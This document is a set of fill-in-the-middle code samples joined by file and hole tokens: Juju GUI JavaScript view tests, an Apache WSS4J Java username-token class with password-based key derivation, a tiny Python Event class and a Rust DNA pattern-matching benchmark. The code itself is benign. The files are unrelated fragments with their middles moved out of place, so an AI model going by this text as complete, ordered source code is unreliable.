this._cleanups.push(fireStub.reset); view.set('deployService', function(charm, serviceAttrs) { var serviceCharm = view.get('entity'); assert.deepEqual(charm, serviceCharm); assert.equal(charm.get('id'), 'cs:precise/ceph-9'); assert.equal(serviceAttrs.icon, 'localhost/v4/precise/ceph-9/icon.svg'); assert.equal(fireStub.calledOnce(), true); var fireArgs = fireStub.lastArguments(); assert.equal(fireArgs[0], 'changeState'); assert.deepEqual(fireArgs[1], { sectionA: { component: 'charmbrowser', metadata: { id: null }}}); done(); }); view._addCharmEnvironment({halt: function() {}}); }); it('should load a file when a hook is selected', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: '<install hook content>' } }); } } }); view.render(); Y.one('#code').all('select option').size().should.equal(3); // Select the hooks install and the content should update. Y.one('#code').all('select option').item(2).set( 'selected', 'selected'); Y.one('#code').one('select').simulate('change'); var content = Y.one('#code').one('div.filecontent'); // Content is escaped, so we read it out as text, not tags. content.get('text').should.eql('<install hook content>'); }); it('should be able to render markdown as html', function() { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'readme.md' ], id: 'precise/wordpress-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: 'README Header\n=============' } }); } } }); view.render(); Y.one('#readme').get('innerHTML').should.eql( '<h1>README Header</h1>'); }); it('should display the config data in the config tab', function() { view = new CharmView({ entity: new models.Charm({ files: [], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' }, options: { 'client-port': { 'default': 9160, 'description': 'Port for client communcation', 'type': 'int' } } }), container: utils.makeContainer(this) }); view.render(); Y.one('#configuration dd div').get('text').should.eql( 'Default: 9160'); Y.one('#configuration dd p').get('text').should.eql( 'Port for client communcation'); }); it('should catch when the open log is clicked', function(done) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); // Hook up to the callback for the click event. view._toggleLog = function(ev) { ev.halt(); done(); }; view.render(); node.one('.changelog .expand').simulate('click'); }); it('changelog is reformatted and displayed', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); // Basics that we have the right number of nodes. node.all('.remaining li').size().should.eql(9); node.all('.first p').size().should.eql(1); // The reminaing starts out hidden. assert(node.one('.changelog .remaining').hasClass('hidden')); }); it('_getInterfaceIntroFlag sets the flag for no requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for no requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for no requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresManyProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresManyProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresManyProvides')); }); it('shows and hides an indicator', function(done) { var hit = 0; var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.showIndicator = function() { hit += 1; }; view.hideIndicator = function() { hit += 1; hit.should.equal(2); done(); }; view.render(); }); it('selects the proper tab when given one', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#configuration', entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); // We've selected the activeTab specified. var selected = view.get('container').one('nav .active'); assert.equal(selected.getAttribute('href'), '#configuration'); }); it('sets the proper change request when closed', function(done) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#configuration', entity: new models.Charm(data), container: utils.makeContainer(this) }); view.on('changeState', function(ev) { assert.equal(ev.details[0].sectionA.metadata.id, null, 'The charm id is not set to null.'); assert.equal(ev.details[0].sectionA.metadata.hash, null, 'The charm details hash is not set to null.'); done(); }); view.render(); view.get('container').one('.charm .back').simulate('click'); }); it('renders related charms when interface tab selected', function() { var data = utils.loadFixture('data/browsercharm.json', true); testContainer = utils.makeContainer(this); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#related-charms', entity: new models.Charm(data), renderTo: testContainer }); view.render(); assert.equal( testContainer.all('#related-charms .token').size(), 18); assert.equal(view.get('entity').get('id'), 'cs:precise/apache2-27'); assert.isTrue(view.loadedRelatedInterfaceCharms); }); it('ignore invalid tab selections', function() { var data = utils.loadFixture('data/browsercharm.json', true); testContainer = utils.makeContainer(this); // We don't want any files so we don't have to mock/load them. data.files = []; var fakeStore = factory.makeFakeCharmstore(); view = new CharmView({ activeTab: '#bws-does-not-exist', entity: new models.Charm(data), renderTo: testContainer, charmstore: fakeStore }); view.render(); assert.equal( testContainer.one('nav .active').getAttribute('href'), '#summary'); }); it('should open header links in a new tab', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); var links = view.get('container').all('.header .details li a'); // Check that we've found the links, otherwise the assert in .each will // succeed when there are no links. assert.equal(links.size() > 0, true); links.each(function(link) { assert.equal(link.getAttribute('target'), '_blank'); }); }); }); })();<|fim▁end|>
/* This file is part of the Juju GUI, which lets users view and manage Juju
<|file_name|>UsernameSecurityTokenImpl.java<|end_file_name|><|fim▁begin|>/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.wss4j.stax.impl.securityToken; import org.apache.wss4j.common.bsp.BSPRule; import org.apache.wss4j.common.ext.WSSecurityException; import org.apache.wss4j.common.principal.UsernameTokenPrincipal; import org.apache.wss4j.common.util.UsernameTokenUtil; import org.apache.wss4j.stax.ext.WSInboundSecurityContext; import org.apache.wss4j.stax.ext.WSSConstants; import org.apache.wss4j.stax.securityToken.UsernameSecurityToken; import org.apache.wss4j.stax.securityToken.WSSecurityTokenConstants; import org.apache.xml.security.exceptions.XMLSecurityException; import org.apache.xml.security.stax.config.JCEAlgorithmMapper; import org.apache.xml.security.stax.ext.XMLSecurityConstants; import org.apache.xml.security.stax.impl.securityToken.AbstractInboundSecurityToken; import javax.crypto.spec.SecretKeySpec; import javax.security.auth.Subject; import java.security.Key; import java.security.Principal; public class UsernameSecurityTokenImpl extends AbstractInboundSecurityToken implements UsernameSecurityToken { private static final long DEFAULT_ITERATION = 1000; private WSSConstants.UsernameTokenPasswordType usernameTokenPasswordType; private String username; private String password; private String createdTime; private byte[] nonce; private byte[] salt; private Long iteration; private final WSInboundSecurityContext wsInboundSecurityContext; private Subject subject; private Principal principal; public UsernameSecurityTokenImpl(WSSConstants.UsernameTokenPasswordType usernameTokenPasswordType, String username, String password, String createdTime, byte[] nonce, byte[] salt, Long iteration, WSInboundSecurityContext wsInboundSecurityContext, String id, WSSecurityTokenConstants.KeyIdentifier keyIdentifier) { super(wsInboundSecurityContext, id, keyIdentifier, true); this.usernameTokenPasswordType = usernameTokenPasswordType; this.username = username; this.password = password;<|fim▁hole|> this.salt = salt; this.iteration = iteration; this.wsInboundSecurityContext = wsInboundSecurityContext; } @Override public boolean isAsymmetric() throws XMLSecurityException { return false; } @Override protected Key getKey(String algorithmURI, XMLSecurityConstants.AlgorithmUsage algorithmUsage, String correlationID) throws XMLSecurityException { Key key = getSecretKey().get(algorithmURI); if (key != null) { return key; } byte[] secretToken = generateDerivedKey(wsInboundSecurityContext); String algoFamily = JCEAlgorithmMapper.getJCEKeyAlgorithmFromURI(algorithmURI); key = new SecretKeySpec(secretToken, algoFamily); setSecretKey(algorithmURI, key); return key; } @Override public WSSecurityTokenConstants.TokenType getTokenType() { return WSSecurityTokenConstants.UsernameToken; } /** * This method generates a derived key as defined in WSS Username * Token Profile. * * @return Returns the derived key a byte array * @throws WSSecurityException */ public byte[] generateDerivedKey() throws WSSecurityException { return generateDerivedKey(wsInboundSecurityContext); } /** * This method generates a derived key as defined in WSS Username * Token Profile. * * @return Returns the derived key a byte array * @throws org.apache.wss4j.common.ext.WSSecurityException * */ protected byte[] generateDerivedKey(WSInboundSecurityContext wsInboundSecurityContext) throws WSSecurityException { if (wsInboundSecurityContext != null) { if (salt == null || salt.length == 0) { wsInboundSecurityContext.handleBSPRule(BSPRule.R4217); } if (iteration == null || iteration < DEFAULT_ITERATION) { wsInboundSecurityContext.handleBSPRule(BSPRule.R4218); } } return UsernameTokenUtil.generateDerivedKey(password, salt, iteration.intValue()); } @Override public Principal getPrincipal() throws WSSecurityException { if (this.principal == null) { this.principal = new UsernameTokenPrincipal() { //todo passwordType and passwordDigest return Enum-Type ? @Override public boolean isPasswordDigest() { return usernameTokenPasswordType == WSSConstants.UsernameTokenPasswordType.PASSWORD_DIGEST; } @Override public String getPasswordType() { return usernameTokenPasswordType.getNamespace(); } @Override public String getName() { return username; } @Override public String getPassword() { return password; } @Override public String getCreatedTime() { return createdTime; } @Override public byte[] getNonce() { return nonce; } }; } return this.principal; } public WSSConstants.UsernameTokenPasswordType getUsernameTokenPasswordType() { return usernameTokenPasswordType; } public String getCreatedTime() { return createdTime; } public String getPassword() { return password; } public String getUsername() { return username; } public byte[] getNonce() { return nonce; } public byte[] getSalt() { return salt; } public Long getIteration() { return iteration; } public void setSubject(Subject subject) { this.subject = subject; } @Override public Subject getSubject() throws WSSecurityException { return subject; } }<|fim▁end|>
this.createdTime = createdTime; this.nonce = nonce;
<|file_name|>event.py<|end_file_name|><|fim▁begin|>from builtins import object import abc<|fim▁hole|>class Event(object): @abc.abstractmethod def trigger(self, *args, **kwargs): pass<|fim▁end|>
<|file_name|>pattern_matching.rs<|end_file_name|><|fim▁begin|>#![feature(test)] extern crate test; extern crate bio; use test::Bencher; use bio::pattern_matching::shift_and::ShiftAnd; use bio::pattern_matching::bndm::BNDM; use bio::pattern_matching::kmp::KMP; use bio::pattern_matching::bom::BOM; use bio::pattern_matching::horspool::Horspool; static TEXT: &'static [u8] = b"GATCACAGGTCTATCACCCTATTAACCACTCACGGGAGCTCTCCATGC\ ATTTGGTATTTTCGTCTGGGGGGTATGCACGCGATAGCATTGCGAGACGCTGGAGCCGGAGCACCCTATGTCGCAGTAT\ CTGTCTTTGATTCCTGCCTCATCCTATTATTTATCGCACCTACGTTCAATATTACAGGCGAACATACTTACTAAAGTGT\ GTTAATTAATTAATGCTTGTAGGACATAATAATAACAATTGAATGTCTGCACAGCCACTTTCCACACAGACATCATAAC\ AAAAAATTTCCACCAAACCCCCCCTCCCCCGCTTCTGGCCACAGCACTTAAACACATCTCTGCCAAACCCCAAAAACAA\ AGAACCCTAACACCAGCCTAACCAGATTTCAAATTTTATCTTTTGGCGGTATGCACTTTTAACAGTCACCCCCCAACTA\ ACACATTATTTTCCCCTCCCACTCCCATACTACTAATCTCATCAATACAACCCCCGCCCATCCTACCCAGCACACACAC\ ACCGCTGCTAACCCCATACCCCGAACCAACCAAACCCCAAAGACACCCCCCACAGTTTATGTAGCTTACCTCCTCAAAG\ CAATACACTGAAAATGTTTAGACGGGCTCACATCACCCCATAAACAAATAGGTTTGGTCCTAGCCTTTCTATTAGCTCT\ TAGTAAGATTACACATGCAAGCATCCCCGTTCCAGTGAGTTCACCCTCTAAATCACCACGATCAAAAGGAACAAGCATC\ AAGCACGCAGCAATGCAGCTCAAAACGCTTAGCCTAGCCACACCCCCACGGGAAACAGCAGTGATTAACCTTTAGCAAT\<|fim▁hole|>AAGTCAATAGAAGCCGGCGTAAAGAGTGTTTTAGATCACCCCCTCCCCAATAAAGCTAAAACTCACCTGAGTTGTAAAA\ AACTCCAGTTGACACAAAATAGACTACGAAAGTGGCTTTAACATATCTGAACACACAATAGCTAAGACCCAAACTGGGA\ TTAGATACCCCACTATGCTTAGCCCTAAACCTCAACAGTTAAATCAACAAAACTGCTCGCCAGAACACTACGAGCCACA\ GCTTAAAACTCAAAGGACCTGGCGGTGCTTCATATCCCTCTAGAGGAGCCTGTTCTGTAATCGATAAACCCCGATCAAC\ CTCACCACCTCTTGCTCAGCCTATATACCGCCATCTTCAGCAAACCCTGATGAAGGCTACAAAGTAAGCGCAAGTACCC\ ACGTAAAGACGTTAGGTCAAGGTGTAGCCCATGAGGTGGCAAGAAATGGGCTACATTTTCTACCCCAGAAAACTACGAT\ AGCCCTTATGAAACTTAAGGGTCGAAGGTGGATTTAGCAGTAAACTAAGAGTAGAGTGCTTAGTTGAACAGGGCCCTGA\ AGCGCGTACACACCGCCCGTCACCCTCCTCAAGTATACTTCAAAGGACATTTAACTAAAACCCCTACGCATTTATATAG\ AGGAGACAAGTCGTAACATGGTAAGTGTACTGGAAAGTGCACTTGGACGAACCAGAGTGTAGCTTAACACAAAGCACCC\ AACTTACACTTAGGAGATTTCAACTTAACTTGACCGCTCTGAGCTAAACCTAGCCCCAAACCCACTCCACCTTACTACC\ AGACAACCTTAGCCAAACCATTTACCCAAATAAAGTATAGGCGATAGAAATTGAAACCTGGCGCAATAGATATAGTACC\ GCAAGGGAAAGATGAAAAATTATAACCAAGCATAATATAGCAAGGACTAACCCCTATACCTTCTGCATAATGAATTAAC\ TAGAAATAACTTTGCAAGGAGAGCCAAAGCTAAGACCCCCGAAACCAGACGAGCTACCTAAGAACAGCTAAAAGAGCAC\ ACCCGTCTATGTAGCAAAATAGTGGGAAGATTTATAGGTAGAGGCGACAAACCTACCGAGCCTGGTGATAGCTGGTTGT\ CCAAGATAGAATCTTAGTTCAACTTTAAATTTGCCCACAGAACCCTCTAAATCCCCTTGTAAATTTAACTGTTAGTCCA\ AAGAGGAACAGCTCTTTGGACACTAGGAAAAAACCTTGTAGAGAGAGTAAAAAATTTAACACCCATAGTAGGCCTAAAA\ GCAGCCACCAATTAAGAAAGCGTTCAAGCTCAACACCCACTACCTAAAAAATCCCAAACATATAACTGAACTCCTCACA\ CCCAATTGGACCAATCTATCACCCTATAGAAGAACTAATGTTAGTATAAGTAACATGAAAACATTCTCCTCCGCATAAG\ CCTGCGTCAGATTAAAACACTGAACTGACAATTAACAGCCCAATATCTACAATCAACCAACAAGTCATTATTACCCTCA\ CTGTCAACCCAACACAGGCATGCTCATAAGGAAAGGTTAAAAAAAGTAAAAGGAACTCGGCAAATCTTACCCCGCCTGT\ TTACCAAAAACATCACCTCTAGCATCACCAGTATTAGAGGCACCGCCTGCCCAGTGACACATGTTTAACGGCCGCGGTA\ CCCTAACCGTGCAAAGGTAGCATAATCACTTGTTCCTTAAATAGGGACCTGTATGAATGGCTCCACGAGGGTTCAGCTG\ TCTCTTACTTTTAACCAGTGAAATTGACCTGCCCGTGAAGAGGCGGGCATAACACAGCAAGACGAGAAGACCCTATGGA\ GCTTTAATTTATTAATGCAAACAGTACCTAACAAACCCACAGGTCCTAAACTACCAAACCTGCATTAAAAATTTCGGTT\ GGGGCGACCTCGGAGCAGAACCCAACCTCCGAGCAGTACATGCTAAGACTTCACCAGTCAAAGCGAACTACTATACTCA\ ATTGATCCAATAACTTGACCAACGGAACAAGTTACCCTAGGGATAACAGCGCAATCCTATTCTAGAGTCCATATCAACA\ ATAGGGTTTACGACCTCGATGTTGGATCAGGACATCCCGATGGTGCAGCCGCTATTAAAGGTTCGTTTGTTCAACGATT\ AAAGTCCTACGTGATCTGAGTTCAGACCGGAGTAATCCAGGTCGGTTTCTATCTACNTTCAAATTCCTCCCTGTACGAA\ AGGACAAGAGAAATAAGGCCTACTTCACAAAGCGCCTTCCCCCGTAAATGATATCATCTCAACTTAGTATTATACCCAC\ ACCCACCCAAGAACAGGGTTTGTTAAGATGGCAGAGCCCGGTAATCGCATAAAACTTAAAACTTTACAGTCAGAGGTTC\ AATTCCTCTTCTTAACAACATACCCATGGCCAACCTCCTACTCCTCATTGTACCCATTCTAATCGCAATGGCATTCCTA\ ATGCTTACCGAACGAAAAATTCTAGGCTATATACAACTACGCAAAGGCCCCAACGTTGTAGGCCCCTACGGGCTACTAC\ AACCCTTCGCTGACGCCATAAAACTCTTCACCAAAGAGCCCCTAAAACCCGCCACATCTACCATCACCCTCTACATCAC\ CGCCCCGACCTTAGCTCTCACCATCGCTCTTCTACTATGAACCCCCCTCCCCATACCCAACCCCCTGGTCAACCTCAAC\ CTAGGCCTCCTATTTATTCTAGCCACCTCTAGCCTAGCCGTTTACTCAATCCTCTGATCAGGGTGAGCATCAAACTCAA\ ACTACGCCCTGATCGGCGCACTGCGAGCAGTAGCCCAAACAATCTCATATGAAGTCACCCTAGCCATCATTCTACTATC\ AACATTACTAATAAGTGGCTCCTTTAACCTCTCCACCCTTATCACAACACAAGAACACCTCTGATTACTCCTGCCATCA\ TGACCCTTGGCCATAATATGATTTATCTCCACACTAGCAGAGACCAACCGAACCCCCTTCGACCTTGCCGAAGGGGAGT\ CCGAACTAGTCTCAGGCTTCAACATCGAATACGCCGCAGGCCCCTTCGCCCTATTCTTCATAGCCGAATACACAAACAT\ TATTATAATAAACACCCTCACCACTACAATCTTCCTAGGAACAACATATGACGCACTCTCCCCTGAACTCTACACAACA\ TATTTTGTCACCAAGACCCTACTTCTAACCTCCCTGTTCTTATGAATTCGAACAGCATACCCCCGATTCCGCTACGACC\ AACTCATACACCTCCTATGAAAAAACTTCCTACCACTCACCCTAGCATTACTTATATGATATGTCTCCATACCCATTAC\ AATCTCCAGCATTCCCCCTCAAACCTAAGAAATATGTCTGATAAAAGAGTTACTTTGATAGAGTAAATAATAGGAGCTT\ AAACCCCCTTATTTCTAGGACTATGAGAATCGAACCCATCCCTGAGAATCCAAAATTCTCCGTGCCACCTATCACACCC\ CATCCTAAAGTAAGGTCAGCTAAATAAGCTATCGGGCCCATACCCCGAAAATGTTGGTTATACCCTTCCCGTACTAATT\ AATCCCCTGGCCCAACCCGTCATCTACTCTACCATCTTTGCAGGCACACTCATCACAGCGCTAAGCTCGCACTGATTTT\ TTACCTGAGTAGGCCTAGAAATAAACATGCTAGCTTTTATTCCAGTTCTAACCAAAAAAATAAACCCTCGTTCCACAGA\ AGCTGCCATCAAGTATTTCCTCACGCAAGCAACCGCATCCATAATCCTTCTAATAGCTATCCTCTTCAACAATATACTC\ TCCGGACAATGAACCATAACCAATACTACCAATCAATACTCATCATTAATAATCATAATAGCTATAGCAATAAAACTAG\ GAATAGCCCCCTTTCACTTCTGAGTCCCAGAGGTTACCCAAGGCACCCCTCTGACATCCGGCCTGCTTCTTCTCACATG\ ACAAAAACTAGCCCCCATCTCAATCATATACCAAATCTCTCCCTCACTAAACGTAAGCCTTCTCCTCACTCTCTCAATC\ TTATCCATCATAGCAGGCAGTTGAGGTGGATTAAACCAAACCCAGCTACGCAAAATCTTAGCATACTCCTCAATTACCC\ ACATAGGATGAATAATAGCAGTTCTACCGTACAACCCTAACATAACCATTCTTAATTTAACTATTTATATTATCCTAAC\ TACTACCGCATTCCTACTACTCAACTTAAACTCCAGCACCACGACCCTACTACTATCTCGCACCTGAAACAAGCTAACA\ TGACTAACACCCTTAATTCCATCCACCCTCCTCTCCCTAGGAGGCCTGCCCCCGCTAACCGGCTTTTTGCCCAAATGGG\ CCATTATCGAAGAATTCACAAAAAACAATAGCCTCATCATCCCCACCATCATAGCCACCATCACCCTCCTTAACCTCTA\ CTTCTACCTACGCCTAATCTACTCCACCTCAATCACACTACTCCCCATATCTAACAACGTAAAAATAAAATGACAGTTT\ GAACATACAAAACCCACCCCATTCCTCCCCACACTCATCGCCCTTACCACGCTACTCCTACCTATCTCCCCTTTTATAC\ TAATAATCTTATAGAAATTTAGGTTAAATACAGACCAAGAGCCTTCAAAGCCCTCAGTAAGTTGCAATACTTAATTTCT\ GTAACAGCTAAGGACTGCAAAACCCCACTCTGCATCAACTGAACGCAAATCAGCCACTTTAATTAAGCTAAGCCCTTAC\ TAGACCAATGGGACTTAAACCCACAAACACTTAGTTAACAGCTAAGCACCCTAATCAACTGGCTTCAATCTACTTCTCC\ CGCCGCCGGGAAAAAAGGCGGGAGAAGCCCCGGCAGGTTTGAAGCTGCTTCTTCGAATTTGCAATTCAATATGAAAATC\ ACCTCGGAGCTGGTAAAAAGAGGCCTAACCCCTGTCTTTAGATTTACAGTCCAATGCTTCACTCAGCCATTTTACCTCA\ CCCCCACTGATGTTCGCCGACCGTTGACTATTCTCTACAAACCACAAAGACATTGGAACACTATACCTATTATTCGGCG\ CATGAGCTGGAGTCCTAGGCACAGCTCTAAGCCTCCTTATTCGAGCCGAGCTGGGCCAGCCAGGCAACCTTCTAGGTAA\ CGACCACATCTACAACGTTATCGTCACAGCCCATGCATTTGTAATAATCTTCTTCATAGTAATACCCATCATAATCGGA\ GGCTTTGGCAACTGACTAGTTCCCCTAATAATCGGTGCCCCCGATATGGCGTTTCCCCGCATAAACAACATAAGCTTCT\ GACTCTTACCTCCCTCTCTCCTACTCCTGCTCGCATCTGCTATAGTGGAGGCCGGAGCAGGAACAGGTTGAACAGTCTA\ CCCTCCCTTAGCAGGGAACTACTCCCACCCTGGAGCCTCCGTAGACCTAACCATCTTCTCCTTACACCTAGCAGGTGTC\ TCCTCTATCTTAGGGGCCATCAATTTCATCACAACAATTATCAATATAAAACCCCCTGCCATAACCCAATACCAAACGC\ CCCTCTTCGTCTGATCCGTCCTAATCACAGCAGTCCTACTTCTCCTATCTCTCCCAGTCCTAGCTGCTGGCATCACTAT\ ACTACTAACAGACCGCAACCTCAACACCACCTTCTTCGACCCCGCCGGAGGAGGAGACCCCATTCTATACCAACACCTA\ TTCTGATTTTTCGGTCACCCTGAAGTTTATATTCTTATCCTACCAGGCTTCGGAATAATCTCCCATATTGTAACTTACT\ ACTCCGGAAAAAAAGAACCATTTGGATACATAGGTATGGTCTGAGCTATGATATCAATTGGCTTCCTAGGGTTTATCGT\ GTGAGCACACCATATATTTACAGTAGGAATAGACGTAGACACACGAGCATATTTCACCTCCGCTACCATAATCATCGCT\ ATCCCCACCGGCGTCAAAGTATTTAGCTGACTCGCCACACTCCACGGAAGCAATATGAAATGATCTGCTGCAGTGCTCT\ GAGCCCTAGGATTCATCTTTCTTTTCACCGTAGGTGGCCTGACTGGCATTGTATTAGCAAACTCATCACTAGACATCGT\ ACTACACGACACGTACTACGTTGTAGCCCACTTCCACTATGTCCTATCAATAGGAGCTGTATTTGCCATCATAGGAGGC\ TTCATTCACTGATTTCCCCTATTCTCAGGCTACACCCTAGACCAAACCTACGCCAAAATCCATTTCACTATCATATTCA\ TCGGCGTAAATCTAACTTTCTTCCCACAACACTTTCTCGGCCTATCCGGAATGCCCCGACGTTACTCGGACTACCCCGA\ TGCATACACCACATGAAACATCCTATCATCTGTAGGCTCATTCATTTCTCTAACAGCAGTAATATTAATAATTTTCATG\ ATTTGAGAAGCCTTCGCTTCGAAGCGAAAAGTCCTAATAGTAGAAGAACCCTCCATAAACCTGGAGTGACTATATGGAT\ GCCCCCCACCCTACCACACATTCGAAGAACCCGTATACATAAAATCTAGACAAAAAAGGAAGGAATCGAACCCCCCAAA\ GCTGGTTTCAAGCCAACCCCATGGCCTCCATGACTTTTTCAAAAAGGTATTAGAAAAACCATTTCATAACTTTGTCAAA\ GTTAAATTATAGGCTAAATCCTATATATCTTAATGGCACATGCAGCGCAAGTAGGTCTACAAGACGCTACTTCCCCTAT\ CATAGAAGAGCTTATCACCTTTCATGATCACGCCCTCATAATCATTTTCCTTATCTGCTTCCTAGTCCTGTATGCCCTT\ TTCCTAACACTCACAACAAAACTAACTAATACTAACATCTCAGACGCTCAGGAAATAGAAACCGTCTGAACTATCCTGC\ CCGCCATCATCCTAGTCCTCATCGCCCTCCCATCCCTACGCATCCTTTACATAACAGACGAGGTCAACGATCCCTCCCT\ TACCATCAAATCAATTGGCCACCAATGGTACTGAACCTACGAGTACACCGACTACGGCGGACTAATCTTCAACTCCTAC\ ATACTTCCCCCATTATTCCTAGAACCAGGCGACCTGCGACTCCTTGACGTTGACAATCGAGTAGTACTCCCGATTGAAG\ CCCCCATTCGTATAATAATTACATCACAAGACGTCTTGCACTCATGAGCTGTCCCCACATTAGGCTTAAAAACAGATGC\ AATTCCCGGACGTCTAAACCAAACCACTTTCACCGCTACACGACCGGGGGTATACTACGGTCAATGCTCTGAAATCTGT\ GGAGCAAACCACAGTTTCATGCCCATCGTCCTAGAATTAATTCCCCTAAAAATCTTTGAAATAGGGCCCGTATTTACCC\ TATAGCACCCCCTCTACCCCCTCTAGAGCCCACTGTAAAGCTAACTTAGCATTAACCTTTTAAGTTAAAGATTAAGAGA\ ACCAACACCTCTTTACAGTGAAATGCCCCAACTAAATACTACCGTATGGCCCACCATAATTACCCCCATACTCCTTACA\ CTATTCCTCATCACCCAACTAAAAATATTAAACACAAACTACCACCTACCTCCCTCACCAAAGCCCATAAAAATAAAAA\ ATTATAACAAACCCTGAGAACCAAAATGAACGAAAATCTGTTCGCTTCATTCATTGCCCCCACAATCCTAGGCCTACCC\ GCCGCAGTACTGATCATTCTATTTCCCCCTCTATTGATCCCCACCTCCAAATATCTCATCAACAACCGACTAATCACCA\ CCCAACAATGACTAATCAAACTAACCTCAAAACAAATGATAACCATACACAACACTAAAGGACGAACCTGATCTCTTAT\ ACTAGTATCCTTAATCATTTTTATTGCCACAACTAACCTCCTCGGACTCCTGCCTCACTCATTTACACCAACCACCCAA\ CTATCTATAAACCTAGCCATGGCCATCCCCTTATGAGCGGGCACAGTGATTATAGGCTTTCGCTCTAAGATTAAAAATG\ CCCTAGCCCACTTCTTACCACAAGGCACACCTACACCCCTTATCCCCATACTAGTTATTATCGAAACCATCAGCCTACT\ CATTCAACCAATAGCCCTGGCCGTACGCCTAACCGCTAACATTACTGCAGGCCACCTACTCATGCACCTAATTGGAAGC\ GCCACCCTAGCAATATCAACCATTAACCTTCCCTCTACACTTATCATCTTCACAATTCTAATTCTACTGACTATCCTAG\ AAATCGCTGTCGCCTTAATCCAAGCCTACGTTTTCACACTTCTAGTAAGCCTCTACCTGCACGACAACACATAATGACC\ CACCAATCACATGCCTATCATATAGTAAAACCCAGCCCATGACCCCTAACAGGGGCCCTCTCAGCCCTCCTAATGACCT\ 